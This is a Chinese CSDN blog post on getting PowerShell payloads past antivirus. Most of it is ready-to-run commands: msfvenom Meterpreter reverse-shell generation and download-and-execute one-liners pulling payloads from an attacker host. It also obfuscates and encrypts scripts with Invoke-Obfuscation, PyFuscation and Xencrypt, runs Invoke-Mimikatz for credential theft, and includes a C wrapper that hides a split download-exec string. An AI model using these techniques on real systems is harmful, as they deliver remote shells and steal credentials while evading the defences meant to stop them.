WEB渗透免杀篇-Powershell免杀

已于 2024-08-19 18:30:17 修改
阅读量331 收藏 8
点赞数 5
分类专栏: 渗透测试 文章标签: WEB渗透 渗透测试 网络安全 WEB安全
于 2024-08-15 08:47:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141205786
版权

 往期文章

 WEB渗透免杀篇-加载器免杀-CSDN博客

 WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

WEB渗透免杀篇-免杀工具全集-CSDN博客

Invoke-Shellcode

生成code
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1
目标执行
> powershell -ep bypass
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')
> Invoke-Shellcode -Shellcode ($buf) -Force

image

image

防护软件没反应

CobaltStrike+Powershell免杀

From: Cobalt Strike Powershell 过卡巴免杀上线 - Y4er的博客

powershell>$string = ''
powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[cs生成的shellcode]')
powershell>$s |foreach { $string = $string + $_.ToString()+','}
powershell>$string>c:\1.txt

修改ps脚本

[Byte[]]$var_code = [Byte[]](payload)

再混淆一下函数和变量 绕过执行命令的拦截 使用cs的参数欺骗

beacon > argue cmd.exe blablabla

obfuscation

GitHub - danielbohannon/Invoke-Obfuscation: PowerShell Obfuscator 生成code

>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1
>powershell -ep bypass
>Import-Module .\Invoke-Obfuscation.psd1
>Invoke-Obfuscation
>set scriptpath C:\Users\y\Desktop\1.ps1
>encoding
>3 #指定编码方式
>out C:\Users\y\Desktop\ok.ps1 #保存

image

image

执行


>powershell -ep bypass -noexit -file ok.ps1

image

image

image

PyFuscation

GitHub - CBHue/PyFuscation: Obfuscate powershell scripts by replacing Function names, Variables and Parameters. 对函数,参数,变量进行混淆

>python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1

image

image

Out-EncryptedScript

http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1
>Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456

image

image

PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")
PS > [String] $cmd = Get-Content .\evil.ps1
PS > Invoke-Expression $cmd
PS > $decrypted = de shabiisme 123456
PS > Invoke-Expression $decrypted
PS > Invoke-Mimikatz

Xencrypt

https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1
>Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100 #递归分层躲避动态查杀

image

>Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1

image

image

拆分+C编译

#include<stdio.h>
#include<stdlib.h>
int main(){
system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");
return 0;
}

行为检测

>powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

直接生成

>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1

执行

>powershell -ep bypass -noexit -file 1.ps1

Powershell行为检测bypass

>powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
Pluto-2003
关注
专栏目录
网络安全-渗透完整笔记
03-27
总的来说,网络安全渗透测试是一门综合性的技术,涵盖漏洞分析、代码审计、网络扫描、攻击执行、后门部署、免杀技术等多个方面。学习这些知识不仅能够帮助安全专家提高防御能力,也能使攻击者了解如何实施更有效的...
Powershell免杀
mingyqf的博客
05-11 2446
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
利用powershell进行免杀
PortugalCR7的博客
06-29 219
利用Invoke Obfuscation进行混淆。查看powershell的版本号()
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 862
免杀对抗-Powershell-混淆无文件
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描
代码讲故事
09-16 560
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描。
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 770
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
第3Web日志分析.pdf
04-22
### Web日志分析知识点 #### 一、Web日志简介 - **定义**:Web日志是指由Web服务器自动生成的记录文件,其中包含了客户端访问Web服务器时的各种信息。 - **作用**: - **安全审计**:通过分析Web日志,可以帮助...
[ 渗透测试面试 ] 渗透测试面试题大集合(详解),看完直怼面试官(十种web漏洞).pdf 程序员面试宝典(安全知识)
02-11
渗透测试面试】涉及到的是网络安全领域中渗透测试的相关面试问题,主要涵盖了SQL注入、XSS注入、CSRF、SSRF以及文件上传等常见的Web漏洞。以下是对这些知识点的详细解释: 1. **SQL注入**: - SQL注入是通过...
PT-ToolKit:我在渗透测试中使用的一些工具
02-11
4. **Powershell Web Access(PSWA)攻击工具**:PSWA是Windows Server的一个功能,允许通过Web界面来运行PowerShell会话。攻击者可能会利用这个功能来绕过防火墙或实施横向移动。 5. **Meterpreter脚本**:...
AD域渗透链和工具推荐
06-05
- **内存导入**:直接从Web服务器下载并执行PowerShell脚本。 ```powershell powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz.ps1')" ``` #### ...
Powershell免杀系列(二)
st3pby的博客
02-20 3295
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
免杀 | powershell免杀的几种简单方式
weixin_66717977的博客
03-13 652
免杀对抗 | powershell免杀 | 免杀技术
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 904
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
免杀学习(三)powershell
m0_62207170的博客
01-12 631
powershell免杀
免杀-PowerShell
weixin_58782362的博客
11-20 776
win自带defender杀毒工具,所以defender和powershell用的同一种语言,很容易被查杀,所以我们尽量就不要用powershell。如果是powershell脚本,只要对方执行就能上线,如果是cmd,先输入powershell,然后payload.ps1。2、执行模式-直接执行命令(有上线代码),最好别在powershell终端执行,容易出错。1、直接在base64编码上添加,然后将垃圾数据替换为空,最后进行解码。混淆、手工混淆,将内容进行base64编码,然后进行解码。
powershell下shellcode分离免杀
最新发布
m0_57836225的博客
08-07 190
在这种情境下,可能会将 shellcode 存储在一个相对隐蔽的位置(如网络上的远程服务器、本地的加密文件等),而 PowerShell 脚本在运行时通过特定的方式获取并执行这段 shellcode。通过分离存储和巧妙的执行方式,试图绕过常见的安全检测机制,实现免杀效果,即避免被杀毒软件、入侵检测系统等安全防护工具识别和阻止。“shellcode”通常是一段精心编写的机器代码,用于执行特定的恶意操作,如获取系统权限、窃取数据等。
我的powershell免杀之路
mingyqf的博客
05-17 1939
我的powershell免杀之路 ​ 原创 tubai
Cobalt Strike免杀:利用Powershell隐蔽上线
"Cobalt Strike beacon 免杀上线方法通过 Powershell" 本文将介绍如何使用 Cobalt Strike 创建一个免杀PowerShell payload 并在目标环境中隐蔽上线。Cobalt Strike 是一款广泛用于红队操作和渗透测试安全工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值